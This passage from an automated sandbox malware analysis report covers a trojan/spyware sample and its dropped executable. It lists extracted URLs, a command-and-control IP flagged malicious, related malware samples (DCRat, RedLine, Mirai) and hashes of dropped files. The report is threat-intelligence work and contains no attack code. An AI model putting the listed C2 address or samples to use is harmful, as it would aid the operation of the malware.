                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drfalse
                                                      		high
                                                      http://www.fontbureau.com/designerspsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001395D000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013C5F000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000138D1000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000137B9000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000136A1000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001388B000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013917000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013B01000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001372D000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000139E9000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013773000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013A75000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013C19000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000136E7000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013BD3000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013845000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013615000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013B47000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000137FF000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001395D000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013C5F000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000138D1000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000137B9000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000136A1000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001388B000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013917000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013B01000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001372D000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000139E9000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013773000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013A75000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013C19000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000136E7000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013BD3000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013845000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013615000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013B47000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000137FF000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.goodfont.co.krpsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.ecosia.org/newtab/psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drfalse
                                                                		high
                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brb8aNRiIJEo.5.drfalse
                                                                  		high
                                                                  http://www.carterandcone.comlpsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.sajatypeworks.compsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.typography.netDpsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ac.ecosia.org/autocomplete?q=psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drfalse
                                                                          		high
                                                                          http://www.fontbureau.com/designers/cabarga.htmlNpsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.founder.com.cn/cn/cThepsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.galapagosdesign.com/staff/dennis.htmpsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.founder.com.cn/cnpsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.fontbureau.com/designers/frere-user.htmlpsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallpsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013A50000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013708000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000138AC000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013B68000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013B22000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013938000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013ADC000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013794000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000139C4000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013BAE000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013820000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013BF4000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013A0A000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001367C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013636000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135F0000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001374E000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013866000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001397E000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000137DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://185.230.138.58psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.00000000035F8000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003161000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.000000000328F000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003779000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.000000000345B000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003445000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                        		unknown
                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchpsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drfalse
                                                                                          		high
                                                                                          http://www.jiyu-kobo.co.jp/psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.galapagosdesign.com/DPleasepsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.fontbureau.com/designers8psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.fonts.compsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.sandoll.co.krpsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://support.mozilla.orgb8aNRiIJEo.5.drfalse
                                                                                                      		high
                                                                                                      http://185.230HpsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003779000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://www.urwpp.deDPleasepsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplespsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013A50000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013708000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000138AC000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013B68000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013B22000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013938000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013ADC000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013794000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000139C4000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013BAE000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013820000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013BF4000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013A0A000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001367C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013636000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135F0000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001374E000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013866000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001397E000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000137DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.zhongyicts.com.cnpsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name3e88PGFfkf.exe, 00000000.00000002.1727533333.0000000003916000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003161000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.sakkal.compsSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4194772541.000000001E0B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.0000000013468000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.000000001351C000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4180602871.00000000135D0000.00000004.00000800.00020000.00000000.sdmp, sNp1HQqzKO.5.dr, gyrFRHPWmE.5.dr, PGRCH9cfsR.5.dr, X90WcnJSth.5.dr, m1xjLE7qWQ.5.dr, u6jIpOvvif.5.dr, FmsKmnN6M1.5.dr, HHXBE8ATu5.5.dr, JJDy2zK4EH.5.dr, j2eQyIFjXv.5.dr, rcAJC5lSDO.5.dr, kJHkZzVrCU.5.dr, 1iGEox8LJK.5.dr, 6zDIcqlpAr.5.dr, rR5sWazf1y.5.dr, 4DRL9HF3xs.5.dr, Mms2F5H8gz.5.dr, cQm8PzaWBg.5.drfalse
                                                                                                                    		high

                                                                                                                    World Map of Contacted IPs

                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs

                                                                                                                    Public IPs

                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    185.230.138.58
                                                                                                                    		unknownGermany
                                                                                                                    		46261QUICKPACKETUStrue

                                                                                                                    General Information

                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1579264
                                                                                                                    Start date and time:2024-12-21 10:06:09 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 9m 5s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:11
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:0
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:3e88PGFfkf.exe
                                                                                                                    renamed because original name is a hash value
                                                                                                                    Original Sample Name:99209E1F30A833E0C7654FCC0AA2C9C5.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@10/311@0/1
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 100%
                                                                                                                    HCA Information:Failed
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                    Warnings

                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 104.122.214.164, 13.107.246.63
                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                    Simulations

                                                                                                                    Behavior and APIs

                                                                                                                    TimeTypeDescription
                                                                                                                    04:07:18API Interceptor12424831x Sleep call for process: psSFLznncXozWndMhTDdwutNn.exe modified

                                                                                                                    Joe Sandbox View / Context

                                                                                                                    IPs

                                                                                                                    No context

                                                                                                                    Domains

                                                                                                                    No context

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    QUICKPACKETUSarm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                    • 198.22.235.170
                                                                                                                    la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 198.22.243.54
                                                                                                                    la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 172.98.171.129
                                                                                                                    surfex.exeGet hashmaliciousRedLineBrowse
                                                                                                                    • 185.218.125.157
                                                                                                                    c2.htaGet hashmaliciousXWormBrowse
                                                                                                                    • 193.26.115.21
                                                                                                                    armv5l.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 23.133.3.186
                                                                                                                    elitebotnet.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                    • 23.133.3.168
                                                                                                                    loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 185.225.234.108
                                                                                                                    c2.htaGet hashmaliciousXWormBrowse
                                                                                                                    • 193.26.115.21
                                                                                                                    c2.htaGet hashmaliciousXWormBrowse
                                                                                                                    • 193.26.115.21

                                                                                                                    JA3 Fingerprints

                                                                                                                    No context

                                                                                                                    Dropped Files

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    C:\Users\user\Desktop\FsgregnE.log9FwQYJSj4N.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      8k1e14tjcx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                        gkcQYEdJSO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog StealerBrowse
                                                                                                                            CPNSQusnwC.exeGet hashmaliciousDCRatBrowse
                                                                                                                              Dfim58cp4J.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                IYXE4Uz61k.exeGet hashmaliciousDCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                                  file.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                    file.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                      hjgesadfseawd.exeGet hashmaliciousDCRatBrowse

                                                                                                                                        Created / dropped Files

                                                                                                                                        C:\Program Files (x86)\Microsoft OneDrive\LogoImages\5940a34987c991

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):188
                                                                                                                                        Entropy (8bit):5.729942448141863
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:WxsqPL5kyQEtifuYEOrLAimKLQDcVRBnAmUoTkcLBHGjZTAX5bk1CiLTQqh5HM3r:Wx7L5kyTtimYEWCKHV7n/zdMZM1k1Ce2
                                                                                                                                        MD5:78131522D229A213C8C99A2D99F34EDD
                                                                                                                                        SHA1:2630606D8309418CEE3C78AE0978119598A1A130
                                                                                                                                        SHA-256:C2002EB012E9F0DEDE0A9A17C406DF84E495521BCD106A5AD1BA82E974A940A4
                                                                                                                                        SHA-512:8C0D9066FA77AE8620C639C6E87A5171932B626B679F0D6FB2F520CB5996D3CAB8D503E1D0B4B820751D184474F8ABC1665778AF4493A9A25F4CD68D14E3ECC6
                                                                                                                                        Malicious:false
                                                                                                                                        Reputation:low
                                                                                                                                        Preview:NbaNeNvED3rU5Oj6J3dExEbUj9GtSRwEjZPtMDBHF01lzH9OpVlbGbXIAGneGCvvGnuf90tG1V86NzecA2E6qU8IBGsGahADFFfMWdPzlfkuca4KlKeO8yFvome2HnpTU41IURGgmOVKuOpkMiePCwFQ9tit9Xs8zQZijw0TD7ltd5BZ73qiIaRizkIl

